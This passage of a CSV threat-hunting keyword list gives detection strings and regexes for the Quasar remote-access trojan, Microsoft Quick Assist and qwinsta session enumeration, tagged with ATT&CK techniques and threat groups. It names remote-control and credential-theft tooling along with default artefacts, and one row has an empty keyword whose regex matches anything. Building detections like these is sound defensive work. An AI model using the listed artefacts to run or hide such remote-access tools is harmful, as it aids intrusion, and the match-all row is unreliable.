T1082 - T1614 - T1016 - T1033 - T1552.001 - T1125","TA0002 - TA0003 - TA0005 - TA0006 - TA0008 - TA0009 - TA0011 - TA0040","N/A","Patchwork - LazyScripter - Gorgon Group - menuPass - BackdoorDiplomacy","RMM","https://github.com/quasar/Quasar","1","0","N/A","N/A","N/A","10","8498","2411","2024-02-29T06:37:37Z","2014-07-08T12:27:59Z" "*C7C363BA-E5B6-4E18-9224-39BC8DA73172*",".{0,1000}C7C363BA\-E5B6\-4E18\-9224\-39BC8DA73172.{0,1000}","greyware_tool_keyword","Quasar","Open-Source Remote Administration Tool for Windows. 
Quasar is a fast and light-weight remote administration tool coded in C#.","T1548.002 - T1547.001 - T1059.003 - T1555 - T1005 - T1573.001 - T1564.001 - T1564.003 - T1105 - T1056.001 - T1112 - T1095 - T1571 - T1090 - T1021.001 - T1053.005 - T1553.002 - T1082 - T1614 - T1016 - T1033 - T1552.001 - T1125","TA0002 - TA0003 - TA0005 - TA0006 - TA0008 - TA0009 - TA0011 - TA0040","N/A","Patchwork - LazyScripter - Gorgon Group - menuPass - BackdoorDiplomacy","RMM","https://github.com/quasar/Quasar","1","0","#GUIDproject","N/A","N/A","10","8498","2411","2024-02-29T06:37:37Z","2014-07-08T12:27:59Z" "*CFCD0759E20F29C399C9D4210BE614E4E020BEE8*",".{0,1000}CFCD0759E20F29C399C9D4210BE614E4E020BEE8.{0,1000}","greyware_tool_keyword","Quasar","Open-Source Remote Administration Tool for Windows. Quasar is a fast and light-weight remote administration tool coded in C#.","T1548.002 - T1547.001 - T1059.003 - T1555 - T1005 - T1573.001 - T1564.001 - T1564.003 - T1105 - T1056.001 - T1112 - T1095 - T1571 - T1090 - T1021.001 - T1053.005 - T1553.002 - T1082 - T1614 - T1016 - T1033 - T1552.001 - T1125","TA0002 - TA0003 - TA0005 - TA0006 - TA0008 - TA0009 - TA0011 - TA0040","N/A","Patchwork - LazyScripter - Gorgon Group - menuPass - BackdoorDiplomacy","RMM","https://github.com/quasar/Quasar","1","0","N/A","N/A","N/A","10","8498","2411","2024-02-29T06:37:37Z","2014-07-08T12:27:59Z" "*localhost:4782*",".{0,1000}localhost\:4782.{0,1000}","greyware_tool_keyword","Quasar","Open-Source Remote Administration Tool for Windows. 
Quasar is a fast and light-weight remote administration tool coded in C#.","T1548.002 - T1547.001 - T1059.003 - T1555 - T1005 - T1573.001 - T1564.001 - T1564.003 - T1105 - T1056.001 - T1112 - T1095 - T1571 - T1090 - T1021.001 - T1053.005 - T1553.002 - T1082 - T1614 - T1016 - T1033 - T1552.001 - T1125","TA0002 - TA0003 - TA0005 - TA0006 - TA0008 - TA0009 - TA0011 - TA0040","N/A","Patchwork - LazyScripter - Gorgon Group - menuPass - BackdoorDiplomacy","RMM","https://github.com/quasar/Quasar","1","1","N/A","N/A","N/A","10","8498","2411","2024-02-29T06:37:37Z","2014-07-08T12:27:59Z" "*namespace Quasar.Client*",".{0,1000}namespace\sQuasar\.Client.{0,1000}","greyware_tool_keyword","Quasar","Open-Source Remote Administration Tool for Windows. Quasar is a fast and light-weight remote administration tool coded in C#.","T1548.002 - T1547.001 - T1059.003 - T1555 - T1005 - T1573.001 - T1564.001 - T1564.003 - T1105 - T1056.001 - T1112 - T1095 - T1571 - T1090 - T1021.001 - T1053.005 - T1553.002 - T1082 - T1614 - T1016 - T1033 - T1552.001 - T1125","TA0002 - TA0003 - TA0005 - TA0006 - TA0008 - TA0009 - TA0011 - TA0040","N/A","Patchwork - LazyScripter - Gorgon Group - menuPass - BackdoorDiplomacy","RMM","https://github.com/quasar/Quasar","1","0","N/A","N/A","N/A","10","8498","2411","2024-02-29T06:37:37Z","2014-07-08T12:27:59Z" "*namespace Quasar.Server*",".{0,1000}namespace\sQuasar\.Server.{0,1000}","greyware_tool_keyword","Quasar","Open-Source Remote Administration Tool for Windows. 
Quasar is a fast and light-weight remote administration tool coded in C#.","T1548.002 - T1547.001 - T1059.003 - T1555 - T1005 - T1573.001 - T1564.001 - T1564.003 - T1105 - T1056.001 - T1112 - T1095 - T1571 - T1090 - T1021.001 - T1053.005 - T1553.002 - T1082 - T1614 - T1016 - T1033 - T1552.001 - T1125","TA0002 - TA0003 - TA0005 - TA0006 - TA0008 - TA0009 - TA0011 - TA0040","N/A","Patchwork - LazyScripter - Gorgon Group - menuPass - BackdoorDiplomacy","RMM","https://github.com/quasar/Quasar","1","0","N/A","N/A","N/A","10","8498","2411","2024-02-29T06:37:37Z","2014-07-08T12:27:59Z" "*ping -n 10 localhost > nul*",".{0,1000}ping\s\-n\s10\slocalhost\s\>\snul.{0,1000}","greyware_tool_keyword","Quasar","Open-Source Remote Administration Tool for Windows. Quasar is a fast and light-weight remote administration tool coded in C#.","T1548.002 - T1547.001 - T1059.003 - T1555 - T1005 - T1573.001 - T1564.001 - T1564.003 - T1105 - T1056.001 - T1112 - T1095 - T1571 - T1090 - T1021.001 - T1053.005 - T1553.002 - T1082 - T1614 - T1016 - T1033 - T1552.001 - T1125","TA0002 - TA0003 - TA0005 - TA0006 - TA0008 - TA0009 - TA0011 - TA0040","N/A","Patchwork - LazyScripter - Gorgon Group - menuPass - BackdoorDiplomacy","RMM","https://github.com/quasar/Quasar","1","0","N/A","N/A","N/A","10","8498","2411","2024-02-29T06:37:37Z","2014-07-08T12:27:59Z" "*Quasar Client Startup*",".{0,1000}Quasar\sClient\sStartup.{0,1000}","greyware_tool_keyword","Quasar","Open-Source Remote Administration Tool for Windows. 
Quasar is a fast and light-weight remote administration tool coded in C#.","T1548.002 - T1547.001 - T1059.003 - T1555 - T1005 - T1573.001 - T1564.001 - T1564.003 - T1105 - T1056.001 - T1112 - T1095 - T1571 - T1090 - T1021.001 - T1053.005 - T1553.002 - T1082 - T1614 - T1016 - T1033 - T1552.001 - T1125","TA0002 - TA0003 - TA0005 - TA0006 - TA0008 - TA0009 - TA0011 - TA0040","N/A","Patchwork - LazyScripter - Gorgon Group - menuPass - BackdoorDiplomacy","RMM","https://github.com/quasar/Quasar","1","0","N/A","N/A","N/A","10","8498","2411","2024-02-29T06:37:37Z","2014-07-08T12:27:59Z" "*Quasar v*\Client-built.exe*",".{0,1000}Quasar\sv.{0,1000}\\Client\-built\.exe.{0,1000}","greyware_tool_keyword","Quasar","Open-Source Remote Administration Tool for Windows. Quasar is a fast and light-weight remote administration tool coded in C#.","T1548.002 - T1547.001 - T1059.003 - T1555 - T1005 - T1573.001 - T1564.001 - T1564.003 - T1105 - T1056.001 - T1112 - T1095 - T1571 - T1090 - T1021.001 - T1053.005 - T1553.002 - T1082 - T1614 - T1016 - T1033 - T1552.001 - T1125","TA0002 - TA0003 - TA0005 - TA0006 - TA0008 - TA0009 - TA0011 - TA0040","N/A","Patchwork - LazyScripter - Gorgon Group - menuPass - BackdoorDiplomacy","RMM","https://github.com/quasar/Quasar","1","0","N/A","N/A","N/A","10","8498","2411","2024-02-29T06:37:37Z","2014-07-08T12:27:59Z" "*Quasar.Client.*",".{0,1000}Quasar\.Client\..{0,1000}","greyware_tool_keyword","Quasar","Open-Source Remote Administration Tool for Windows. 
Quasar is a fast and light-weight remote administration tool coded in C#.","T1548.002 - T1547.001 - T1059.003 - T1555 - T1005 - T1573.001 - T1564.001 - T1564.003 - T1105 - T1056.001 - T1112 - T1095 - T1571 - T1090 - T1021.001 - T1053.005 - T1553.002 - T1082 - T1614 - T1016 - T1033 - T1552.001 - T1125","TA0002 - TA0003 - TA0005 - TA0006 - TA0008 - TA0009 - TA0011 - TA0040","N/A","Patchwork - LazyScripter - Gorgon Group - menuPass - BackdoorDiplomacy","RMM","https://github.com/quasar/Quasar","1","1","N/A","N/A","N/A","10","8498","2411","2024-02-29T06:37:37Z","2014-07-08T12:27:59Z" "*Quasar.Common.Tests\*",".{0,1000}Quasar\.Common\.Tests\\.{0,1000}","greyware_tool_keyword","Quasar","Open-Source Remote Administration Tool for Windows. Quasar is a fast and light-weight remote administration tool coded in C#.","T1548.002 - T1547.001 - T1059.003 - T1555 - T1005 - T1573.001 - T1564.001 - T1564.003 - T1105 - T1056.001 - T1112 - T1095 - T1571 - T1090 - T1021.001 - T1053.005 - T1553.002 - T1082 - T1614 - T1016 - T1033 - T1552.001 - T1125","TA0002 - TA0003 - TA0005 - TA0006 - TA0008 - TA0009 - TA0011 - TA0040","N/A","Patchwork - LazyScripter - Gorgon Group - menuPass - BackdoorDiplomacy","RMM","https://github.com/quasar/Quasar","1","0","N/A","N/A","N/A","10","8498","2411","2024-02-29T06:37:37Z","2014-07-08T12:27:59Z" "*Quasar.exe*",".{0,1000}Quasar\.exe.{0,1000}","greyware_tool_keyword","Quasar","Open-Source Remote Administration Tool for Windows. 
Quasar is a fast and light-weight remote administration tool coded in C#.","T1548.002 - T1547.001 - T1059.003 - T1555 - T1005 - T1573.001 - T1564.001 - T1564.003 - T1105 - T1056.001 - T1112 - T1095 - T1571 - T1090 - T1021.001 - T1053.005 - T1553.002 - T1082 - T1614 - T1016 - T1033 - T1552.001 - T1125","TA0002 - TA0003 - TA0005 - TA0006 - TA0008 - TA0009 - TA0011 - TA0040","N/A","Patchwork - LazyScripter - Gorgon Group - menuPass - BackdoorDiplomacy","RMM","https://github.com/quasar/Quasar","1","1","N/A","N/A","N/A","10","8498","2411","2024-02-29T06:37:37Z","2014-07-08T12:27:59Z" "*Quasar.Server*",".{0,1000}Quasar\.Server.{0,1000}","greyware_tool_keyword","Quasar","Open-Source Remote Administration Tool for Windows. Quasar is a fast and light-weight remote administration tool coded in C#.","T1548.002 - T1547.001 - T1059.003 - T1555 - T1005 - T1573.001 - T1564.001 - T1564.003 - T1105 - T1056.001 - T1112 - T1095 - T1571 - T1090 - T1021.001 - T1053.005 - T1553.002 - T1082 - T1614 - T1016 - T1033 - T1552.001 - T1125","TA0002 - TA0003 - TA0005 - TA0006 - TA0008 - TA0009 - TA0011 - TA0040","N/A","Patchwork - LazyScripter - Gorgon Group - menuPass - BackdoorDiplomacy","RMM","https://github.com/quasar/Quasar","1","0","N/A","N/A","N/A","10","8498","2411","2024-02-29T06:37:37Z","2014-07-08T12:27:59Z" "*Quasar.Server\Program.cs*",".{0,1000}Quasar\.Server\\Program\.cs.{0,1000}","greyware_tool_keyword","Quasar","Open-Source Remote Administration Tool for Windows. 
Quasar is a fast and light-weight remote administration tool coded in C#.","T1548.002 - T1547.001 - T1059.003 - T1555 - T1005 - T1573.001 - T1564.001 - T1564.003 - T1105 - T1056.001 - T1112 - T1095 - T1571 - T1090 - T1021.001 - T1053.005 - T1553.002 - T1082 - T1614 - T1016 - T1033 - T1552.001 - T1125","TA0002 - TA0003 - TA0005 - TA0006 - TA0008 - TA0009 - TA0011 - TA0040","N/A","Patchwork - LazyScripter - Gorgon Group - menuPass - BackdoorDiplomacy","RMM","https://github.com/quasar/Quasar","1","0","N/A","N/A","N/A","10","8498","2411","2024-02-29T06:37:37Z","2014-07-08T12:27:59Z" "*Quasar.sln*",".{0,1000}Quasar\.sln.{0,1000}","greyware_tool_keyword","Quasar","Open-Source Remote Administration Tool for Windows. Quasar is a fast and light-weight remote administration tool coded in C#.","T1548.002 - T1547.001 - T1059.003 - T1555 - T1005 - T1573.001 - T1564.001 - T1564.003 - T1105 - T1056.001 - T1112 - T1095 - T1571 - T1090 - T1021.001 - T1053.005 - T1553.002 - T1082 - T1614 - T1016 - T1033 - T1552.001 - T1125","TA0002 - TA0003 - TA0005 - TA0006 - TA0008 - TA0009 - TA0011 - TA0040","N/A","Patchwork - LazyScripter - Gorgon Group - menuPass - BackdoorDiplomacy","RMM","https://github.com/quasar/Quasar","1","1","N/A","N/A","N/A","10","8498","2411","2024-02-29T06:37:37Z","2014-07-08T12:27:59Z" "*Quasar.v1.4.1.zip*",".{0,1000}Quasar\.v1\.4\.1\.zip.{0,1000}","greyware_tool_keyword","Quasar","Open-Source Remote Administration Tool for Windows. 
Quasar is a fast and light-weight remote administration tool coded in C#.","T1548.002 - T1547.001 - T1059.003 - T1555 - T1005 - T1573.001 - T1564.001 - T1564.003 - T1105 - T1056.001 - T1112 - T1095 - T1571 - T1090 - T1021.001 - T1053.005 - T1553.002 - T1082 - T1614 - T1016 - T1033 - T1552.001 - T1125","TA0002 - TA0003 - TA0005 - TA0006 - TA0008 - TA0009 - TA0011 - TA0040","N/A","Patchwork - LazyScripter - Gorgon Group - menuPass - BackdoorDiplomacy","RMM","https://github.com/quasar/Quasar","1","0","N/A","N/A","N/A","10","8498","2411","2024-02-29T06:37:37Z","2014-07-08T12:27:59Z" "*quasar/Quasar*",".{0,1000}quasar\/Quasar.{0,1000}","greyware_tool_keyword","Quasar","Open-Source Remote Administration Tool for Windows. Quasar is a fast and light-weight remote administration tool coded in C#.","T1548.002 - T1547.001 - T1059.003 - T1555 - T1005 - T1573.001 - T1564.001 - T1564.003 - T1105 - T1056.001 - T1112 - T1095 - T1571 - T1090 - T1021.001 - T1053.005 - T1553.002 - T1082 - T1614 - T1016 - T1033 - T1552.001 - T1125","TA0002 - TA0003 - TA0005 - TA0006 - TA0008 - TA0009 - TA0011 - TA0040","N/A","Patchwork - LazyScripter - Gorgon Group - menuPass - BackdoorDiplomacy","RMM","https://github.com/quasar/Quasar","1","1","N/A","N/A","N/A","10","8498","2411","2024-02-29T06:37:37Z","2014-07-08T12:27:59Z" "*Quasar-master.zip*",".{0,1000}Quasar\-master\.zip.{0,1000}","greyware_tool_keyword","Quasar","Open-Source Remote Administration Tool for Windows. 
Quasar is a fast and light-weight remote administration tool coded in C#.","T1548.002 - T1547.001 - T1059.003 - T1555 - T1005 - T1573.001 - T1564.001 - T1564.003 - T1105 - T1056.001 - T1112 - T1095 - T1571 - T1090 - T1021.001 - T1053.005 - T1553.002 - T1082 - T1614 - T1016 - T1033 - T1552.001 - T1125","TA0002 - TA0003 - TA0005 - TA0006 - TA0008 - TA0009 - TA0011 - TA0040","N/A","Patchwork - LazyScripter - Gorgon Group - menuPass - BackdoorDiplomacy","RMM","https://github.com/quasar/Quasar","1","1","N/A","N/A","N/A","10","8498","2411","2024-02-29T06:37:37Z","2014-07-08T12:27:59Z" "*QuasarRAT*",".{0,1000}QuasarRAT.{0,1000}","greyware_tool_keyword","Quasar","Open-Source Remote Administration Tool for Windows. Quasar is a fast and light-weight remote administration tool coded in C#.","T1548.002 - T1547.001 - T1059.003 - T1555 - T1005 - T1573.001 - T1564.001 - T1564.003 - T1105 - T1056.001 - T1112 - T1095 - T1571 - T1090 - T1021.001 - T1053.005 - T1553.002 - T1082 - T1614 - T1016 - T1033 - T1552.001 - T1125","TA0002 - TA0003 - TA0005 - TA0006 - TA0008 - TA0009 - TA0011 - TA0040","N/A","Patchwork - LazyScripter - Gorgon Group - menuPass - BackdoorDiplomacy","RMM","https://github.com/quasar/Quasar","1","1","N/A","N/A","N/A","10","8498","2411","2024-02-29T06:37:37Z","2014-07-08T12:27:59Z" "*ylAo2kAlUS2kYkala!*",".{0,1000}ylAo2kAlUS2kYkala!.{0,1000}","greyware_tool_keyword","Quasar","Open-Source Remote Administration Tool for Windows. 
Quasar is a fast and light-weight remote administration tool coded in C#.","T1548.002 - T1547.001 - T1059.003 - T1555 - T1005 - T1573.001 - T1564.001 - T1564.003 - T1105 - T1056.001 - T1112 - T1095 - T1571 - T1090 - T1021.001 - T1053.005 - T1553.002 - T1082 - T1614 - T1016 - T1033 - T1552.001 - T1125","TA0002 - TA0003 - TA0005 - TA0006 - TA0008 - TA0009 - TA0011 - TA0040","N/A","Patchwork - LazyScripter - Gorgon Group - menuPass - BackdoorDiplomacy","RMM","https://github.com/quasar/Quasar","1","0","N/A","N/A","N/A","10","8498","2411","2024-02-29T06:37:37Z","2014-07-08T12:27:59Z" "* --webview-exe-name=QuickAssist.exe*",".{0,1000}\s\-\-webview\-exe\-name\=QuickAssist\.exe.{0,1000}","greyware_tool_keyword","QuickAssist","Sharing remote desktop with Microsoft Quick assit","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://apps.microsoft.com/detail/9p7bp5vnwkx5","1","0","N/A","Quick assist could be preinstalled in some Windows versions","10","10","N/A","N/A","N/A","N/A" "*/Assistance rapide Installer.exe*",".{0,1000}\/Assistance\srapide\sInstaller\.exe.{0,1000}","greyware_tool_keyword","QuickAssist","Sharing remote desktop with Microsoft Quick assit","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://apps.microsoft.com/detail/9p7bp5vnwkx5","1","1","N/A","Quick assist could be preinstalled in some Windows versions","10","10","N/A","N/A","N/A","N/A" "*/Assistenza rapida Installer.exe*",".{0,1000}\/Assistenza\srapida\sInstaller\.exe.{0,1000}","greyware_tool_keyword","QuickAssist","Sharing remote desktop with Microsoft Quick assit","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://apps.microsoft.com/detail/9p7bp5vnwkx5","1","1","N/A","Quick assist could be preinstalled in some Windows versions","10","10","N/A","N/A","N/A","N/A" "*/Quick Assist Installer.exe*",".{0,1000}\/Quick\sAssist\sInstaller\.exe.{0,1000}","greyware_tool_keyword","QuickAssist","Sharing remote desktop with Microsoft Quick 
assit","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://apps.microsoft.com/detail/9p7bp5vnwkx5","1","1","N/A","Quick assist could be preinstalled in some Windows versions","10","10","N/A","N/A","N/A","N/A" "*/Quick%20Assist%20Installer.exe*",".{0,1000}\/Quick\%20Assist\%20Installer\.exe.{0,1000}","greyware_tool_keyword","QuickAssist","Sharing remote desktop with Microsoft Quick assit","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://apps.microsoft.com/detail/9p7bp5vnwkx5","1","1","N/A","Quick assist could be preinstalled in some Windows versions","10","10","N/A","N/A","N/A","N/A" "*\AppData\Local\Temp\RemoteHelp\EBWebView*",".{0,1000}\\AppData\\Local\\Temp\\RemoteHelp\\EBWebView.{0,1000}","greyware_tool_keyword","QuickAssist","Sharing remote desktop with Microsoft Quick assit","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://apps.microsoft.com/detail/9p7bp5vnwkx5","1","0","N/A","Quick assist could be preinstalled in some Windows versions","10","10","N/A","N/A","N/A","N/A" "*\Assistance rapide Installer.exe*",".{0,1000}\\Assistance\srapide\sInstaller\.exe.{0,1000}","greyware_tool_keyword","QuickAssist","Sharing remote desktop with Microsoft Quick assit","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://apps.microsoft.com/detail/9p7bp5vnwkx5","1","0","N/A","Quick assist could be preinstalled in some Windows versions","10","10","N/A","N/A","N/A","N/A" "*\Assistenza rapida Installer.exe*",".{0,1000}\\Assistenza\srapida\sInstaller\.exe.{0,1000}","greyware_tool_keyword","QuickAssist","Sharing remote desktop with Microsoft Quick assit","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://apps.microsoft.com/detail/9p7bp5vnwkx5","1","0","N/A","Quick assist could be preinstalled in some Windows versions","10","10","N/A","N/A","N/A","N/A" 
"*\CurrentControlSet\Services\bam\State\UserSettings\*\MicrosoftCorporationII.QuickAssist_*",".{0,1000}\\CurrentControlSet\\Services\\bam\\State\\UserSettings\\.{0,1000}\\MicrosoftCorporationII\.QuickAssist_.{0,1000}","greyware_tool_keyword","QuickAssist","Sharing remote desktop with Microsoft Quick assit","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://apps.microsoft.com/detail/9p7bp5vnwkx5","1","0","N/A","Quick assist could be preinstalled in some Windows versions","10","10","N/A","N/A","N/A","N/A" "*\Microsoft.RemoteAssistance.QuickAssist\*",".{0,1000}\\Microsoft\.RemoteAssistance\.QuickAssist\\.{0,1000}","greyware_tool_keyword","QuickAssist","Sharing remote desktop with Microsoft Quick assit","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://apps.microsoft.com/detail/9p7bp5vnwkx5","1","0","N/A","Quick assist could be preinstalled in some Windows versions","10","10","N/A","N/A","N/A","N/A" "*\microsoft.remoteassistance.quickassist\*",".{0,1000}\\microsoft\.remoteassistance\.quickassist\\.{0,1000}","greyware_tool_keyword","QuickAssist","Sharing remote desktop with Microsoft Quick assit","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://apps.microsoft.com/detail/9p7bp5vnwkx5","1","0","N/A","Quick assist could be preinstalled in some Windows versions","10","10","N/A","N/A","N/A","N/A" "*\Quick Assist Installer.exe*",".{0,1000}\\Quick\sAssist\sInstaller\.exe.{0,1000}","greyware_tool_keyword","QuickAssist","Sharing remote desktop with Microsoft Quick assit","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://apps.microsoft.com/detail/9p7bp5vnwkx5","1","0","N/A","Quick assist could be preinstalled in some Windows versions","10","10","N/A","N/A","N/A","N/A" "*\QuickAssist.exe*",".{0,1000}\\QuickAssist\.exe.{0,1000}","greyware_tool_keyword","QuickAssist","Sharing remote desktop with Microsoft Quick assit","T1021 - T1071 - T1090","TA0003 - TA0008 - 
TA0011","N/A","N/A","RMM","https://apps.microsoft.com/detail/9p7bp5vnwkx5","1","0","N/A","Quick assist could be preinstalled in some Windows versions","10","10","N/A","N/A","N/A","N/A" "*\QuickAssist.pdb*",".{0,1000}\\QuickAssist\.pdb.{0,1000}","greyware_tool_keyword","QuickAssist","Sharing remote desktop with Microsoft Quick assit","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://apps.microsoft.com/detail/9p7bp5vnwkx5","1","0","N/A","Quick assist could be preinstalled in some Windows versions","10","10","N/A","N/A","N/A","N/A" "*\SOFTWARE\Microsoft\Tracing\Quick Assist Installer*",".{0,1000}\\SOFTWARE\\Microsoft\\Tracing\\Quick\sAssist\sInstaller.{0,1000}","greyware_tool_keyword","QuickAssist","Sharing remote desktop with Microsoft Quick assit","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://apps.microsoft.com/detail/9p7bp5vnwkx5","1","0","N/A","Quick assist could be preinstalled in some Windows versions","10","10","N/A","N/A","N/A","N/A" "*\WindowsApps\MicrosoftCorporationII.QuickAssist_*",".{0,1000}\\WindowsApps\\MicrosoftCorporationII\.QuickAssist_.{0,1000}","greyware_tool_keyword","QuickAssist","Sharing remote desktop with Microsoft Quick assit","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://apps.microsoft.com/detail/9p7bp5vnwkx5","1","0","N/A","Quick assist could be preinstalled in some Windows versions","10","10","N/A","N/A","N/A","N/A" "*\WinSxS\amd64_microsoft-windows-quickassist_*",".{0,1000}\\WinSxS\\amd64_microsoft\-windows\-quickassist_.{0,1000}","greyware_tool_keyword","QuickAssist","Sharing remote desktop with Microsoft Quick assit","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://apps.microsoft.com/detail/9p7bp5vnwkx5","1","0","N/A","Quick assist could be preinstalled in some Windows versions","10","10","N/A","N/A","N/A","N/A" "**",".{0,1000}\.{0,1000}","greyware_tool_keyword","QuickAssist","Sharing remote desktop with Microsoft 
Quick assit","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://apps.microsoft.com/detail/9p7bp5vnwkx5","1","0","N/A","Quick assist could be preinstalled in some Windows versions - this row's keyword is empty and its regex matches any input; confirm the intended pattern before enabling","10","10","N/A","N/A","N/A","N/A" "*>Quick Assist Component<*",".{0,1000}\>Quick\sAssist\sComponent\<.{0,1000}","greyware_tool_keyword","QuickAssist","Sharing remote desktop with Microsoft Quick assit","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://apps.microsoft.com/detail/9p7bp5vnwkx5","1","0","N/A","Quick assist could be preinstalled in some Windows versions","10","10","N/A","N/A","N/A","N/A" "*Assistencia Rapida Installer.exe*",".{0,1000}Assistencia\sRapida\sInstaller\.exe.{0,1000}","greyware_tool_keyword","QuickAssist","Sharing remote desktop with Microsoft Quick assit","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://apps.microsoft.com/detail/9p7bp5vnwkx5","1","0","N/A","Quick assist could be preinstalled in some Windows versions","10","10","N/A","N/A","N/A","N/A" "*Command: beginsharing Result: {""responsename"":""beginsharing""*",".{0,1000}Command\:\sbeginsharing\sResult\:\s\{\""responsename\""\:\""beginsharing\"".{0,1000}","greyware_tool_keyword","QuickAssist","Sharing remote desktop with Microsoft Quick assit","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://apps.microsoft.com/detail/9p7bp5vnwkx5","1","0","N/A","Quick assist could be preinstalled in some Windows versions","10","10","N/A","N/A","N/A","N/A" "*contactsupportrelays4-prod.eastus.cloudapp.azure.com*",".{0,1000}contactsupportrelays4\-prod\.eastus\.cloudapp\.azure\.com.{0,1000}","greyware_tool_keyword","QuickAssist","Sharing remote desktop with Microsoft Quick assit","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://apps.microsoft.com/detail/9p7bp5vnwkx5","1","0","N/A","Quick assist could be preinstalled in some Windows versions","10","10","N/A","N/A","N/A","N/A" 
"*https://rdprelay*.support.services.microsoft.com*",".{0,1000}https\:\/\/rdprelay.{0,1000}\.support\.services\.microsoft\.com.{0,1000}","greyware_tool_keyword","QuickAssist","Sharing remote desktop with Microsoft Quick assit","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://apps.microsoft.com/detail/9p7bp5vnwkx5","1","1","N/A","Quick assist could be preinstalled in some Windows versions","10","10","N/A","N/A","N/A","N/A" "*https://remoteassistance.support.services.microsoft.com/*",".{0,1000}https\:\/\/remoteassistance\.support\.services\.microsoft\.com\/.{0,1000}","greyware_tool_keyword","QuickAssist","Sharing remote desktop with Microsoft Quick assit","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://apps.microsoft.com/detail/9p7bp5vnwkx5","1","1","N/A","Quick assist could be preinstalled in some Windows versions","10","10","N/A","N/A","N/A","N/A" "*Incoming cmd Message: {""command"":""beginsharing""*",".{0,1000}Incoming\scmd\sMessage\:\s\{\""command\""\:\""beginsharing\"".{0,1000}","greyware_tool_keyword","QuickAssist","Sharing remote desktop with Microsoft Quick assit","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://apps.microsoft.com/detail/9p7bp5vnwkx5","1","0","N/A","Quick assist could be preinstalled in some Windows versions","10","10","N/A","N/A","N/A","N/A" "*Info: {""command"":""forwardtoagent"", ""context"":{""command"":""requestresponse"",""context"":{""responsename"":""beginsharing*",".{0,1000}Info\:\s\{\""command\""\:\""forwardtoagent\"",\s\""context\""\:\{\""command\""\:\""requestresponse\"",\""context\""\:\{\""responsename\""\:\""beginsharing.{0,1000}","greyware_tool_keyword","QuickAssist","Sharing remote desktop with Microsoft Quick assit","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://apps.microsoft.com/detail/9p7bp5vnwkx5","1","0","N/A","Quick assist could be preinstalled in some Windows 
versions","10","10","N/A","N/A","N/A","N/A" "*Info: {""command"":""rdp_native_event"", ""context"":{ ""eventname"":""rdp_native_relay_connection_succeeded""} *",".{0,1000}Info\:\s\{\""command\""\:\""rdp_native_event\"",\s\""context\""\:\{\s\""eventname\""\:\""rdp_native_relay_connection_succeeded\""\}\s.{0,1000}","greyware_tool_keyword","QuickAssist","Sharing remote desktop with Microsoft Quick assit","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://apps.microsoft.com/detail/9p7bp5vnwkx5","1","0","N/A","Quick assist could be preinstalled in some Windows versions","10","10","N/A","N/A","N/A","N/A" "*QuickAssist.exe launched*",".{0,1000}QuickAssist\.exe\slaunched.{0,1000}","greyware_tool_keyword","QuickAssist","Sharing remote desktop with Microsoft Quick assit","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://apps.microsoft.com/detail/9p7bp5vnwkx5","1","0","N/A","Quick assist could be preinstalled in some Windows versions","10","10","N/A","N/A","N/A","N/A" "*SOFTWARE\Microsoft\QuickAssist*",".{0,1000}SOFTWARE\\Microsoft\\QuickAssist.{0,1000}","greyware_tool_keyword","QuickAssist","Sharing remote desktop with Microsoft Quick assit","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://apps.microsoft.com/detail/9p7bp5vnwkx5","1","0","N/A","Quick assist could be preinstalled in some Windows versions","10","10","N/A","N/A","N/A","N/A" "*Szybka pomoc Installer.exe*",".{0,1000}Szybka\spomoc\sInstaller\.exe.{0,1000}","greyware_tool_keyword","QuickAssist","Sharing remote desktop with Microsoft Quick assit","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://apps.microsoft.com/detail/9p7bp5vnwkx5","1","0","N/A","Quick assist could be preinstalled in some Windows versions","10","10","N/A","N/A","N/A","N/A" "*cmd /c *qwinsta*",".{0,1000}cmd\s\/c\s.{0,1000}qwinsta.{0,1000}","greyware_tool_keyword","qwinsta","enumerate rdp session on a remote server","T1049 - T1018 - 
